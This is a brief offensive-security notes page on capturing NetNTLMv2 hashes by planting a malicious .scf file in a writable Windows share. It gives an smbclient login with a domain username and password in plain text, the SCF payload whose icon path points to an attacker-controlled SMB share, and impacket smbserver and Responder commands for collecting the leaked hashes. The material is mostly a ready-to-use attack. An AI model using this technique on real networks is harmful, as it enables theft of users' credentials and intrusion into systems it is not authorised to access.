SCF Files

Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.

Access to Shared Folder

smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'

Create SCF file

[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop

Upload SCF file to Shared Folder

Serve the attacker Shared Folder

python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support

And now we need to wait for an interaction with the payroll-2024 shared folder.

Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.

Or using Responder.py

sudo python3 Responder.py -I eth0

Wait and once we detect an interaction with the folder:

PreviousTools to exploit AD things NextKerberos

Last updated 8 months ago